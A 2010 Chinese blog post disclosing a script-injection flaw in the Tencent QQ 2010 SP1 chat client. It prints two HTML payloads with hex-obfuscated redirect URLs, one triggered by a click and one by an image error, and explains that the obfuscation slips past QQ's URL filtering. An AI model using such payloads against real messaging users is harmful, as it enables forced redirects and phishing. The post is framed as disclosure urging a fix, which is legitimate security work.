腾讯QQ 2010 SP1(1760)出现严重溢出漏洞!

QQ2010SP1(1760)严重溢出漏洞-诸葛草帽电脑工作室

        这个漏洞在最新版的qq里7月26日更新的! 腾讯QQ一向是腾讯主打的产品,意想不到前天发布的QQ2010SP1竟然有如此大漏洞。首先囧一下:脚本出错还会提示错误:

 

 

1、消息记录的Javascript、Html标签没有屏蔽

1、消息记录的Javascript、Html标签没有屏蔽-诸葛草帽电脑工作室
2、消息盒子Javascript、Html标签没有屏蔽
消息盒子Javascript、Html标签没有屏蔽-诸葛草帽电脑工作室

3、小实验

1、发送代码:<input onclick="window.location=’x68x74x74x70x3ax2fx2fx77x77x77x2ex62x6fx77x6fx73x2ex63x6fx6d’" />

因为腾讯会自动将url转换,我们必须混淆url才能发送

小实验-诸葛草帽电脑工作室
小实验-诸葛草帽电脑工作室
小实验-诸葛草帽电脑工作室

4、超牛代码

<img src=’tetet’ onerror="window.location=’x68x74x74x70x3ax2fx2fx77x77x77x2ex62x6fx77x6fx73x2ex63x6fx6d’"/>

因为要点击才能触发,想到一个不用点击就能触发的代码。

5、希望腾讯快点修复,这个漏洞非同小可

6、本漏洞由TGL发现。

qq2010sp1漏洞-诸葛草帽电脑工作室

Write a comment

Comments: 1
  • #1

    独星 (Friday, 30 July 2010 21:39)

    对我无效……